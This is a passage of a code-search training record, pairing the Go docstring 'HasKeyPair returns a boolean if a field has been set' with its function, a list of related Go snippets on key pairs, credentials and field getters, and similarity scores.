fail.NotImplementedError(\"InspectKeyPair() not implemented yet\") // FIXME: Technical debt\n}", "func (o *ModelsAWSDetails) GetAccessKeyOk() (*string, bool) {\n\tif o == nil || o.AccessKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AccessKey, true\n}", "func (p *ph) KeyPair() (publicKey, privateKey []byte, err error) {\n\tsecretKey, err := randomBytes(p._SKLEN)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpublicKey, err = p.PubKey(secretKey)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn publicKey, secretKey, nil\n}", "func (o OceanOutput) KeyPair() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Ocean) pulumi.StringPtrOutput { return v.KeyPair }).(pulumi.StringPtrOutput)\n}", "func (o *PairAnyValueAnyValue) GetFirstOk() (*interface{}, bool) {\n\tif o == nil || o.First == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.First, true\n}", "func (k *KeyPair) isAbleToSign() bool {\n\treturn k.privKey != nil\n}", "func (ls KvPairs) Get(key string) (Bytex, bool) {\n\n\tkvp_mu.RLock()\n\tdefer kvp_mu.RUnlock()\n\n\tfor _, prev := range ls {\n\n\t\tif prev.Key == key {\n\t\t\treturn Bytex(prev.Value), true\n\t\t}\n\t}\n\n\treturn Bytex(\"\"), false\n}", "func (o *GetCredentialsResponseCredential) GetAccessKeyOk() (*string, bool) {\n\tif o == nil || o.AccessKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AccessKey, true\n}", "func (o *DeviceClient) GetRsaPublickeyOk() (*string, bool) {\n\tif o == nil || o.RsaPublickey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.RsaPublickey, true\n}", "func (o *Service) GetCredentialsOk() (map[string]map[string]bool, bool) {\n\tif o == nil || o.Credentials == nil {\n\t\tvar ret map[string]map[string]bool\n\t\treturn ret, false\n\t}\n\treturn *o.Credentials, true\n}", "func (o *BasicBot) GetApiKeyOk() (*interface{}, bool) {\n\tif o == nil || o.ApiKey == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ApiKey, true\n}", "func NewKeyPair(rootKey RootKeyable, chainKey ChainKeyable) *KeyPair {\n\tkeyPair := KeyPair{\n\t\tRootKey: rootKey,\n\t\tChainKey: chainKey,\n\t}\n\n\treturn &keyPair\n}", "func (o *NotificationConfig) GetRoutingKeyOk() (*string, bool) {\n\tif o == nil || o.RoutingKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.RoutingKey, true\n}", "func (o *TppCredentialsParams) GetTppNameOk() (*string, bool) {\n\tif o == nil || o.TppName == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TppName, true\n}", "func (o *PairAnyValueAnyValue) GetSecondOk() (*interface{}, bool) {\n\tif o == nil || o.Second == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Second, true\n}", "func (o *ProcessorSignalDecisionReportRequest) GetSecretOk() (*string, bool) {\n\tif o == nil || o.Secret == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Secret, true\n}", "func (o *UcsdBackupInfoAllOf) GetEncryptionKeyOk() (*string, bool) {\n\tif o == nil || o.EncryptionKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.EncryptionKey, true\n}", "func (o *StorageHitachiVolumeMigrationPair) GetLocalCloneCopypairIdOk() (*string, bool) {\n\tif o == nil || o.LocalCloneCopypairId == nil {\n\t\treturn nil, false\n\t}\n\treturn o.LocalCloneCopypairId, true\n}", "func (_m *Keychain) GetStoredKeyPairInLibP2PFormat() (crypto.PrivKey, crypto.PubKey, error) {\n\tret := _m.Called()\n\n\tvar r0 crypto.PrivKey\n\tif rf, ok := ret.Get(0).(func() crypto.PrivKey); ok {\n\t\tr0 = rf()\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(crypto.PrivKey)\n\t\t}\n\t}\n\n\tvar r1 crypto.PubKey\n\tif rf, ok := ret.Get(1).(func() crypto.PubKey); ok {\n\t\tr1 = rf()\n\t} else {\n\t\tif ret.Get(1) != nil {\n\t\t\tr1 = ret.Get(1).(crypto.PubKey)\n\t\t}\n\t}\n\n\tvar r2 error\n\tif rf, ok := ret.Get(2).(func() error); ok {\n\t\tr2 = rf()\n\t} else {\n\t\tr2 = ret.Error(2)\n\t}\n\n\treturn r0, r1, r2\n}", "func (o *ReplicaMapping) GetEncryptionKeyOk() (*string, bool) {\n\tif o == nil || o.EncryptionKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.EncryptionKey, true\n}", "func (o *SamlConfigurationProperties) GetSpPrivateKeyAliasOk() (*SamlConfigurationPropertyItemsString, bool) {\n\tif o == nil || o.SpPrivateKeyAlias == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SpPrivateKeyAlias, true\n}", "func (o *EnvironmentVariablePair1) GetNameOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Name, true\n}", "func (o *TppCredentialsParams) GetLabelOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Label, true\n}", "func (o *PipelineSshKeyPairAllOf) HasPrivateKey() bool {\n\tif o != nil && o.PrivateKey != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Wireless) GetBssidOk() (string, bool) {\n\tif o == nil || o.Bssid == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.Bssid, true\n}", "func (o *VulnUpdateNotification) GetRecordStateValOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.RecordStateVal.Get(), o.RecordStateVal.IsSet()\n}", "func (o *PaymentInitiationPaymentGetResponse) GetWalletIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.WalletId.Get(), o.WalletId.IsSet()\n}", "func GenerateKeyPair() ([]byte, []byte) {\n\tconst seckeyLen = 32\n\tvar seckey []byte\n\tvar pubkey []byte\n\nnew_seckey:\n\tseckey = RandByte(seckeyLen)\n\tif secp.SeckeyIsValid(seckey) != 1 {\n\t\tgoto new_seckey // regen\n\t}\n\n\tpubkey = pubkeyFromSeckey(seckey)\n\tif pubkey == nil {\n\t\tlog.Panic(\"IMPOSSIBLE: pubkey invalid from valid seckey\")\n\t\tgoto new_seckey\n\t}\n\tif ret := secp.PubkeyIsValid(pubkey); ret != 1 {\n\t\tlog.Panicf(\"ERROR: Pubkey invalid, ret=%d\", ret)\n\t\tgoto new_seckey\n\t}\n\n\treturn pubkey, seckey\n}", "func (o *InlineObject4) GetParamOk() (string, bool) {\n\tif o == nil || o.Param == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.Param, true\n}", "func (o *AccessKey) GetStateOk() (*string, bool) {\n\tif o == nil || o.State == nil {\n\t\treturn nil, false\n\t}\n\treturn o.State, true\n}", "func (o *CreateInstance) GetParametersOk() (*CreateInstanceParameters, bool) {\n\tif o == nil || IsNil(o.Parameters) {\n\t\treturn nil, false\n\t}\n\treturn o.Parameters, true\n}", "func GenerateKeyPair() (*rsa.PrivateKey, *rsa.PublicKey, error) {\n\tprivKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn privKey, &privKey.PublicKey, nil\n}", "func (o *CloudAwsVirtualMachineAllOf) SetKeyPair(v CloudAwsKeyPairRelationship) {\n\to.KeyPair = &v\n}", "func (b ButtonState) PairCheckSelf() (selfPair bool, maybeDouble bool) {\n\tif b.HasAll(ButtonsSLSR_L) || b.HasAll(ButtonsSLSR_R) {\n\t\treturn true, false\n\t}\n\tif b.HasAll(ButtonsLR) || b.HasAll(ButtonsZLZR) {\n\t\treturn true, false\n\t}\n\tif b.HasAny(ButtonsLZL) || b.HasAny(ButtonsRZR) {\n\t\treturn false, true\n\t}\n\treturn false, false\n}", "func hasValidKeyPairs(pairs [][]string) bool {\n\tfor _, pair := range pairs {\n\t\tif !isValidKeyPair(pair) {\n\t\t\treturn false\n\t\t}\n\t}\n\treturn true\n}" ]
[ "0.7061945", "0.6845642", "0.67340356", "0.64795125", "0.6298071", "0.6288251", "0.6209228", "0.6136143", "0.6126581", "0.61210567", "0.6116035", "0.6100783", "0.6099167", "0.606505", "0.60561866", "0.60348153", "0.6034516", "0.60280585", "0.600494", "0.597722", "0.597281", "0.59683317", "0.5929154", "0.5917671", "0.588171", "0.58744943", "0.5849665", "0.5827286", "0.5789789", "0.5772183", "0.57578224", "0.5754807", "0.5726463", "0.5713218", "0.56973153", "0.566501", "0.5619404", "0.56114507", "0.5597132", "0.5592221", "0.55915004", "0.5589768", "0.5587607", "0.55815804", "0.5575298", "0.55595493", "0.55458343", "0.554487", "0.5522411", "0.55164075", "0.5494257", "0.5480558", "0.54577327", "0.54492134", "0.5443091", "0.54277563", "0.5421291", "0.54057914", "0.54045016", "0.5393935", "0.5390876", "0.53895855", "0.5373736", "0.53675514", "0.53543496", "0.53403014", "0.53289485", "0.5326197", "0.53109944", "0.52817875", "0.52759737", "0.52710724", "0.5270948", "0.52628475", "0.52546483", "0.5251042", "0.5243632", "0.52413857", "0.5240351", "0.5238261", "0.5231451", "0.5228805", "0.5225603", "0.5219171", "0.52183384", "0.5212428", "0.5209057", "0.52070546", "0.5205377", "0.51899856", "0.51848686", "0.51843315", "0.5180205", "0.517699", "0.5176728", "0.51590526", "0.51402915", "0.5135329", "0.51148593", "0.5114522" ]
0.8113723
0
HasKeyPair returns a boolean if a field has been set.
func (o *CloudAwsVirtualMachineAllOf) HasKeyPair() bool { if o != nil && o.KeyPair != nil { return true } return false }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (w *Whisper) HasKeyPair(id string) bool {\n\tw.keyMu.RLock()\n\tdefer w.keyMu.RUnlock()\n\treturn w.privateKeys[id] != nil\n}", "func IsKey(sqlField SQLFieldStruct) bool {\n\treturn strings.HasSuffix(sqlField.Field, sqlIDSuffix)\n}", "func (e JsonToMetadata_KeyValuePairValidationError) Key() bool { return e.key }", "func (e OutOfOneofValidationError) Key() bool { return e.key }", "func (m *IndexedMap[PrimaryKey, Value, Idx]) Has(ctx context.Context, pk PrimaryKey) (bool, error) {\n\treturn m.m.Has(ctx, pk)\n}", "func (s *Coach) HasPK() bool {\n\treturn s.ID != CoachTable.z[CoachTable.s.PKFieldIndex]\n}", "func (o *MicrosoftGraphWorkbookSortField) HasKey() bool {\n\tif o != nil && o.Key != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *Product) HasPK() bool {\n\treturn s.ProductID != ProductTable.z[ProductTable.s.PKFieldIndex]\n}", "func HasKey(key string) bool { return c.HasKey(key) }", "func (s *Permutation) HasPK() bool {\n\treturn s.Uuid != PermutationTable.z[PermutationTable.s.PKFieldIndex]\n}", "func (s *Library) HasPK() bool {\n\treturn s.ID != LibraryTable.z[LibraryTable.s.PKFieldIndex]\n}", "func (e TwoValidOneofsValidationError) Key() bool { return e.key }", "func (l *Info) HasKey(argKey string) bool {\n\tfor _, key := range (*l).Keys {\n\t\tif argKey == key {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (e TwoOneofsValidationError) Key() bool { return e.key }", "func (s *Recording) HasPK() bool {\n\treturn s.ID != RecordingTable.z[RecordingTable.s.PKFieldIndex]\n}", "func (e ResponseMapperValidationError) Key() bool { return e.key }", "func (e HeaderMatchValidationError) Key() bool { return e.key }", "func (e CreateResponseValidationError) Key() bool { return e.key }", "func (e NoOneofsValidationError) Key() bool { return e.key }", "func (e GlobalSecondaryIndexValidationError) Key() bool { return e.key }", "func (e ProviderRegisterRequestValidationError) Key() bool { return e.key }", "func (e CreateBookingResponseValidationError) Key() bool { return e.key }", "func (o *LongProperty) HasKey() bool {\n\tif o != nil && o.Key != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (e ClusterPairTargetValidationError) Key() bool { return e.key }", "func (OnfTest1_Cont1A_List4_List4A_Key) IsYANGGoKeyStruct() {}", "func (e ProviderInfoValidationError) Key() bool { return e.key }", "func (o *SearchTagItem) HasKey() bool {\n\tif o != nil && o.Key != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (e GetEventByIDResponseValidationError) Key() bool { return e.key }", "func (e RetrieveBookingResponseValidationError) Key() bool { return e.key }", "func (e GetObjectSchemasRequestValidationError) Key() bool { return e.key }", "func (e GetEventByIDRequestValidationError) Key() bool { return e.key }", "func (e CommonResponseValidationError) Key() bool { return e.key }", "func (s *Template) HasPK() bool {\n\treturn s.ID != TemplateTable.z[TemplateTable.s.PKFieldIndex]\n}", "func (e CreateBookingRequestValidationError) Key() bool { return e.key }", "func (e GetObjectSchemasResponseValidationError) Key() bool { return e.key }", "func (e EmptyValidationError) Key() bool { return e.key }", "func (e LdapConfigValidationError) Key() bool { return e.key }", "func (e TestSpecificationValidationError) Key() bool { return e.key }", "func (e PlmnIdentityValidationError) Key() bool { return e.key }", "func (e ConfigureAssessmentResponseValidationError) Key() bool { return e.key }", "func (e RegisterResponseValidationError) Key() bool { return e.key }", "func (o *LabelProperties) HasKey() bool {\n\tif o != nil && o.Key != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (e BitStringValidationError) Key() bool { return e.key }", "func (e ResolveResponseValidationError) Key() bool { return e.key }", "func (e AssessmentResultValidationError) Key() bool { return e.key }", "func (e StreamEventsRequest_IdentifierValidationError) Key() bool { return e.key }", "func (e ConfigureAssessmentRequestValidationError) Key() bool { return e.key }", "func (e TagSpecifierValidationError) Key() bool { return e.key }", "func (e AllowedValuesValidationError) Key() bool { return e.key }", "func (app *propertyBuilder) IsPrimaryKey() PropertyBuilder {\n\tapp.isPrimaryKey = true\n\treturn app\n}", "func (meta metadata) hasFieldWithIndex() bool {\n\tfor _, field := range meta.fields {\n\t\tif field.index == true {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (e CreateUserResponseValidationError) Key() bool { return e.key }", "func (e JsonToMetadataValidationError) Key() bool { return e.key }", "func (e Transaction_MetaValidationError) Key() bool { return e.key }", "func (e SimpleResponseValidationError) Key() bool { return e.key }", "func (e CreateRequestValidationError) Key() bool { return e.key }", "func (e CreateRequestValidationError) Key() bool { return e.key }", "func (e SearchResponseValidationError) Key() bool { return e.key }", "func (e InitFederationClusterReqValidationError) Key() bool { return e.key }", "func (rw RowsWraps) HaveKey(key string) bool {\n\tfor _, v := range rw {\n\t\tif v.Key == key {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (e ResolveRequestValidationError) Key() bool { return e.key }", "func (e GetEventByIDResponse_OptionValidationError) Key() bool { return e.key }", "func (e IdentifierValidationError) Key() bool { return e.key }", "func (e HeadersResponseValidationError) Key() bool { return e.key }", "func (e HelloResponseValidationError) Key() bool { return e.key }", "func (e GetUserResponseValidationError) Key() bool { return e.key }", "func (e ArfcnValidationError) Key() bool { return e.key }", "func (e GetResponseValidationError) Key() bool { return e.key }", "func (e RetrieveResponseValidationError) Key() bool { return e.key }", "func (e DataPointValidationError) Key() bool { return e.key }", "func (p Property) IsStoredOrPrimaryKey() bool {\n\treturn p.PrimaryKey || p.IsStored()\n}", "func (e ResultValidationError) Key() bool { return e.key }", "func (e SXGValidationError) Key() bool { return e.key }", "func (db *FlatDatabase) Has(key []byte) (bool, error) { panic(\"not supported\") }", "func (e SimpleRequestValidationError) Key() bool { return e.key }", "func (e CreatePaymentResponseValidationError) Key() bool { return e.key }", "func (e Matcher_MatcherList_FieldMatcherValidationError) Key() bool { return e.key }", "func (s Schema) HasKey(key string) bool {\n\treturn hasKey(key, s)\n}", "func (e ApplicationPubSubIdentifiersValidationError) Key() bool { return e.key }", "func (e ResponseValidationError) Key() bool { return e.key }", "func (e ProviderWithAudiencesValidationError) Key() bool { return e.key }", "func IsSet(key string) bool { return viper.IsSet(key) }", "func (e ChannelPayResponseValidationError) Key() bool { return e.key }", "func (v Value) HasKeys() bool {\n\treturn len(v.AccessKeyID) != 0 && len(v.SecretAccessKey) != 0\n}", "func (e CellGlobalIdValidationError) Key() bool { return e.key }", "func (e RegisterRequestValidationError) Key() bool { return e.key }", "func (gu githubUser) hasKeys() bool {\n return len(gu.keys) >0\n}", "func (e RanparameterIdValidationError) Key() bool { return e.key }", "func (e ProcessingResponseValidationError) Key() bool { return e.key }", "func (e CreatePaymentRequestValidationError) Key() bool { return e.key }", "func (e PerRouteConfigValidationError) Key() bool { return e.key }", "func (idx IndexType) Has(keyPtr interface{}) (ok bool) {\n\t(*idx.mutexPtr).RLock()\n\tok = idx.bt.Has(idx.rec(keyPtr))\n\t(*idx.mutexPtr).RUnlock()\n\treturn\n}", "func (e EutracellIdentityValidationError) Key() bool { return e.key }", "func (e ChannelPayRequestValidationError) Key() bool { return e.key }", "func (e UpdateResponseValidationError) Key() bool { return e.key }", "func isPresent(d []*swan.Pair, k string) bool {\n\tfor _, e := range d {\n\t\tif strings.EqualFold(e.Key, k) {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (e ProcessingRequestValidationError) Key() bool { return e.key }", "func isValidKeyPair(param []string) bool {\n\treturn len(param) == 2\n}", "func (mdl *Model) Has(key interface{}) bool {\n\tif std.ModelTypeList == mdl.GetType() {\n\t\tif k, ok := key.(int); ok && k < len(mdl.data) {\n\t\t\treturn true\n\t\t}\n\t} else if kstr, ok := key.(string); ok {\n\t\tif _, ok := mdl.hashIdx[kstr]; ok {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (e CreateTodoResponseValidationError) Key() bool { return e.key }" ]
[ "0.6467199", "0.6100302", "0.6066123", "0.59033513", "0.5875062", "0.58476514", "0.5822769", "0.5799911", "0.5778194", "0.57627964", "0.575807", "0.57573044", "0.57283425", "0.57172203", "0.5706952", "0.570559", "0.566098", "0.5642313", "0.56397974", "0.5637489", "0.56078404", "0.5601024", "0.5591756", "0.5591755", "0.5591197", "0.558459", "0.5584325", "0.55613893", "0.55581915", "0.5548956", "0.5543127", "0.55293715", "0.5528575", "0.55155396", "0.55136615", "0.55090106", "0.55027705", "0.54950535", "0.54943925", "0.54939103", "0.5490249", "0.5488595", "0.5481717", "0.5475208", "0.54705274", "0.5466503", "0.5461781", "0.54587615", "0.5456604", "0.54481417", "0.5442181", "0.54414886", "0.5438259", "0.5438045", "0.54359174", "0.5435794", "0.5435794", "0.5435321", "0.5425441", "0.5425084", "0.54223734", "0.5421836", "0.5421382", "0.5421334", "0.5420693", "0.5415343", "0.54136723", "0.54130507", "0.5410718", "0.5407598", "0.5407321", "0.5406941", "0.5400338", "0.540001", "0.53996015", "0.53988695", "0.5390892", "0.53905445", "0.53889644", "0.53877217", "0.538697", "0.53853565", "0.53850615", "0.5384564", "0.5383535", "0.5382572", "0.53817546", "0.5379169", "0.5376088", "0.5374555", "0.5371107", "0.53710777", "0.537088", "0.5370156", "0.537015", "0.53694797", "0.5362304", "0.5361078", "0.53602207", "0.5357702" ]
0.60744905
2
SetKeyPair gets a reference to the given CloudAwsKeyPairRelationship and assigns it to the KeyPair field.
func (o *CloudAwsVirtualMachineAllOf) SetKeyPair(v CloudAwsKeyPairRelationship) { o.KeyPair = &v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CloudAwsVirtualMachineAllOf) GetKeyPair() CloudAwsKeyPairRelationship {\n\tif o == nil || o.KeyPair == nil {\n\t\tvar ret CloudAwsKeyPairRelationship\n\t\treturn ret\n\t}\n\treturn *o.KeyPair\n}", "func (s stack) DeleteKeyPair(ctx context.Context, id string) fail.Error {\n\treturn fail.NotImplementedError(\"DeleteKeyPair() not implemented yet\") // FIXME: Technical debt\n}", "func (client *Client) CreateKeyPair(name string) (*model.KeyPair, error) {\n\treturn client.feclt.CreateKeyPair(name)\n}", "func (client *Client) CreateKeyPair(name string) (*model.KeyPair, error) {\n\treturn client.osclt.CreateKeyPair(name)\n}", "func (s stack) InspectKeyPair(ctx context.Context, id string) (*abstract.KeyPair, fail.Error) {\n\treturn nil, fail.NotImplementedError(\"InspectKeyPair() not implemented yet\") // FIXME: Technical debt\n}", "func (client *Client) DeleteKeyPair(id string) error {\n\treturn client.feclt.DeleteKeyPair(id)\n}", "func (c *Curve25519) GenerateKeyPair() (KeyPair, error) {\n\n\tvar priv [32]byte\n\n\t// fill private key\n\t_, err := c.randSource.Read(priv[:])\n\tif err != nil {\n\t\treturn KeyPair{}, err\n\t}\n\n\tpriv[0] &= 248\n\tpriv[31] &= 127\n\tpriv[31] |= 64\n\n\tvar pubKey [32]byte\n\tcurve25519.ScalarBaseMult(&pubKey, &priv)\n\n\treturn KeyPair{\n\t\tPrivateKey: priv,\n\t\tPublicKey: pubKey,\n\t}, nil\n\n}", "func CreateKeyPair(conn *ec2.EC2) (KeyPair, error) {\n\tname := generateKeyPairName()\n\tvar kp KeyPair\n\tkp.KeyName = name\n\n\tparams := &ec2.CreateKeyPairInput{\n\t\tKeyName: aws.String(name),\n\t}\n\n\tresp, err := conn.CreateKeyPair(params)\n\tif err != nil {\n\t\treturn kp, err\n\t}\n\n\tkp.Fingerprint = *resp.KeyFingerprint\n\tkp.PrivateKeyPEM = *resp.KeyMaterial\n\tkp.Created = true\n\n\treturn kp, nil\n}", "func (client *Client) DeleteKeyPair(id string) error {\n\treturn client.osclt.DeleteKeyPair(id)\n}", "func GenerateKeyPair() (*ecdsa.PrivateKey, error ) {\n\tkey, err := ecdsa.GenerateKey(btcec.S256(), rand.Reader)\n\tif err != nil { return nil, err } \n\treturn key, nil\n}", "func (w *Whisper) AddKeyPair(key *ecdsa.PrivateKey) (string, error) {\n\tid, err := GenerateRandomID()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to generate ID: %s\", err)\n\t}\n\n\tw.keyMu.Lock()\n\tw.privateKeys[id] = key\n\tw.keyMu.Unlock()\n\n\treturn id, nil\n}", "func (b *Base) GenerateKeyPair(req *GenerateKeyPairReq) (*GenerateKeyPairResp, error) {\n\treturn nil, ErrFunctionNotSupported\n}", "func NewKeyPair(pub crypto.PublicKey, privArmor string) KeyPair {\n\treturn KeyPair{\n\t\tPublicKey: pub,\n\t\tPrivKeyArmor: privArmor,\n\t}\n}", "func (n *nauth) GenerateKeyPair(passphrase string) ([]byte, []byte, error) {\n\tpriv, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tprivDer := x509.MarshalPKCS1PrivateKey(priv)\n\tprivBlock := pem.Block{\n\t\tType: \"RSA PRIVATE KEY\",\n\t\tHeaders: nil,\n\t\tBytes: privDer,\n\t}\n\tprivPem := pem.EncodeToMemory(&privBlock)\n\n\tpub, err := ssh.NewPublicKey(&priv.PublicKey)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpubBytes := ssh.MarshalAuthorizedKey(pub)\n\treturn privPem, pubBytes, nil\n}", "func GenerateKeyPair() (*rsa.PrivateKey, *rsa.PublicKey, error) {\n\tprivKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn privKey, &privKey.PublicKey, nil\n}", "func (f *fileStore) SaveKeyPair(p *Pair) error {\n\tif err := Save(f.privateKeyFile, p, true); err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"Saved the key : %s at %s\\n\", p.Public.Addr, f.publicKeyFile) //nolint\n\treturn Save(f.publicKeyFile, p.Public, false)\n}", "func DeleteKeyPair(conn *ec2.EC2, kp KeyPair) (KeyPair, error) {\n\tparams := &ec2.DeleteKeyPairInput{\n\t\tKeyName: aws.String(kp.KeyName),\n\t}\n\n\t_, err := conn.DeleteKeyPair(params)\n\tif err != nil {\n\t\treturn kp, err\n\t}\n\n\tkp.Created = false\n\treturn kp, nil\n}", "func (o InstanceOutput) KeyPair() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringPtrOutput { return v.KeyPair }).(pulumi.StringPtrOutput)\n}", "func (a *Client) SaveKeypair(params *SaveKeypairParams, authInfo runtime.ClientAuthInfoWriter) (*SaveKeypairNoContent, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewSaveKeypairParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"saveKeypair\",\n\t\tMethod: \"PUT\",\n\t\tPathPattern: \"/keypair\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\"},\n\t\tParams: params,\n\t\tReader: &SaveKeypairReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, errs.Wrap(err, \"Could not save client-side encrypted keypair to platform.\")\n\t}\n\treturn result.(*SaveKeypairNoContent), nil\n\n}", "func GenerateKeyPair(group *schnorr.Group) (*SecKey, *PubKey) {\n\ts1 := common.GetRandomInt(group.Q)\n\ts2 := common.GetRandomInt(group.Q)\n\th1 := group.Exp(group.G, s1)\n\th2 := group.Exp(group.G, s2)\n\n\treturn NewSecKey(s1, s2), NewPubKey(h1, h2)\n}", "func (as AccountStorage) SetRelationship(ctx sdk.Context, me types.AccountKey, other types.AccountKey, relationship *Relationship) sdk.Error {\n\tstore := ctx.KVStore(as.key)\n\trelationshipByte, err := as.cdc.MarshalJSON(*relationship)\n\tif err != nil {\n\t\treturn ErrFailedToMarshalRelationship(err)\n\t}\n\tstore.Set(getRelationshipKey(me, other), relationshipByte)\n\treturn nil\n}", "func (s stack) CreateKeyPair(ctx context.Context, name string) (_ *abstract.KeyPair, ferr fail.Error) {\n\tif valid.IsNil(s) {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif name == \"\" {\n\t\treturn nil, fail.InvalidParameterError(\"name\", \"cannot be empty string\")\n\t}\n\n\treturn abstract.NewKeyPair(name)\n}", "func GenerateKeyPair() (pubkey, privkey []byte) {\n\tkey, err := ecdsa.GenerateKey(secp256k1.S256(), rand.Reader)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tpubkey = elliptic.Marshal(secp256k1.S256(), key.X, key.Y)\n\tprivkey = make([]byte, 32)\n\tblob := key.D.Bytes()\n\tcopy(privkey[32-len(blob):], blob)\n\treturn\n}", "func ParseKeyPair(r io.Reader) (*KeyPair, error) {\n\tvar s ssbSecret\n\tif err := json.NewDecoder(r).Decode(&s); err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.Parse: JSON decoding failed\")\n\t}\n\n\tpublic, err := base64.StdEncoding.DecodeString(strings.TrimSuffix(s.Public, \".ed25519\"))\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.Parse: base64 decode of public part failed\")\n\t}\n\n\tprivate, err := base64.StdEncoding.DecodeString(strings.TrimSuffix(s.Private, \".ed25519\"))\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.Parse: base64 decode of private part failed\")\n\t}\n\n\tvar kp secrethandshake.EdKeyPair\n\tcopy(kp.Public[:], public)\n\tcopy(kp.Secret[:], private)\n\n\tssbkp := KeyPair{\n\t\tId: s.ID,\n\t\tPair: kp,\n\t}\n\treturn &ssbkp, nil\n}", "func (z *Float64) SetPair(a, b float64) *Float64 {\n\tz.l = a\n\tz.r = b\n\treturn z\n}", "func NewPlaybackKeyPair(ctx *pulumi.Context,\n\tname string, args *PlaybackKeyPairArgs, opts ...pulumi.ResourceOption) (*PlaybackKeyPair, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.PublicKey == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'PublicKey'\")\n\t}\n\tvar resource PlaybackKeyPair\n\terr := ctx.RegisterResource(\"aws:ivs/playbackKeyPair:PlaybackKeyPair\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewKeyPair(rootKey RootKeyable, chainKey ChainKeyable) *KeyPair {\n\tkeyPair := KeyPair{\n\t\tRootKey: rootKey,\n\t\tChainKey: chainKey,\n\t}\n\n\treturn &keyPair\n}", "func NewKeyPair() (*keyPair, error) {\n\tprivKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tprivKey.Precompute()\n\n\tpubKey := &privKey.PublicKey\n\treturn &keyPair{Private: privKey, Public: pubKey}, nil\n}", "func GenerateKeyPair(rand io.Reader) (*PublicKey, *PrivateKey, error) {\n\tvar seed [KeySeedSize]byte\n\tif rand == nil {\n\t\trand = cryptoRand.Reader\n\t}\n\t_, err := io.ReadFull(rand, seed[:])\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpk, sk := NewKeyFromSeed(seed[:])\n\treturn pk, sk, nil\n}", "func (s *SkyСoinService) GenerateKeyPair() *KeysResponse {\n\tseed := getRand()\n\trand.Read(seed)\n\tpub, sec := cipher.GenerateDeterministicKeyPair(seed)\n\treturn &KeysResponse{\n\t\tPrivate: sec.Hex(),\n\t\tPublic: pub.Hex(),\n\t}\n}", "func (f *fileStore) LoadKeyPair(targetScheme *crypto.Scheme) (*Pair, error) {\n\tp := new(Pair)\n\tif targetScheme != nil {\n\t\tp.Public = new(Identity)\n\t\tp.Public.Scheme = targetScheme\n\t}\n\tif err := Load(f.privateKeyFile, p); err != nil {\n\t\treturn nil, err\n\t}\n\treturn p, Load(f.publicKeyFile, p.Public)\n}", "func GenerateKeyPair() *rsa.PrivateKey {\n\n\tprivateKey, err := rsa.GenerateKey(rand.Reader, 